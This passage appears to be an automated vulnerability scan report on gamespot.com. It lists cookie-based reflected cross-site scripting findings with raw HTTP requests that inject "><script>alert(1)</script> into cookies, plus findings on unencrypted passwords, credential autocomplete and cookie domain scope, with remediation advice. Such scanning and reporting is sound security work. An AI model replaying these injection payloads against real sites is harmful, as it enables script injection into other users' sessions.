Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /xbox360/action/saintsrow/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw7249b"><script>alert(1)</script>55d67d26090; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1b50"><script>alert(1)</script>f6177be5a80 was submitted in the globid cookie. This input was echoed as f1b50\"><script>alert(1)</script>f6177be5a80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /xbox360/action/saintsrow/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHXf1b50"><script>alert(1)</script>f6177be5a80; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 548ed"><script>alert(1)</script>bc457ef0454 was submitted in the XCLGFbrowser cookie. This input was echoed as 548ed\"><script>alert(1)</script>bc457ef0454 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /xbox360/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw548ed"><script>alert(1)</script>bc457ef0454; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 298e1"><script>alert(1)</script>daf5fa047ea was submitted in the globid cookie. This input was echoed as 298e1\"><script>alert(1)</script>daf5fa047ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /xbox360/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX298e1"><script>alert(1)</script>daf5fa047ea; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3945a"><script>alert(1)</script>4f61f707626 was submitted in the XCLGFbrowser cookie. This input was echoed as 3945a\"><script>alert(1)</script>4f61f707626 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /xbox360/rpg/falloutnewvegas/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw3945a"><script>alert(1)</script>4f61f707626; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd018"><script>alert(1)</script>9f1c4ad55b3 was submitted in the globid cookie. This input was echoed as fd018\"><script>alert(1)</script>9f1c4ad55b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /xbox360/rpg/falloutnewvegas/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHXfd018"><script>alert(1)</script>9f1c4ad55b3; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /android/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /best-of-2010/game-of-the-year/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cheats.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /downloads/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ds/action/supermariobrosds/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ds/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /features/6257476/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /features/6285489/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/fav_boards.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /games.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /iphone/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /misc/aboutus.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /misc/helpcenter.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /misc/rss/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /misc/worldwide.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mobile/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /newthisweek.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/common/login.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/facebook/connect/login.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/forums/post_msg.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/forums/show_msgs.php?topic_id=26182411 HTTP/1.1 Host: www.gamespot.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/forums/show_topics.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pc/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pc/rpg/worldofwarcraft/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
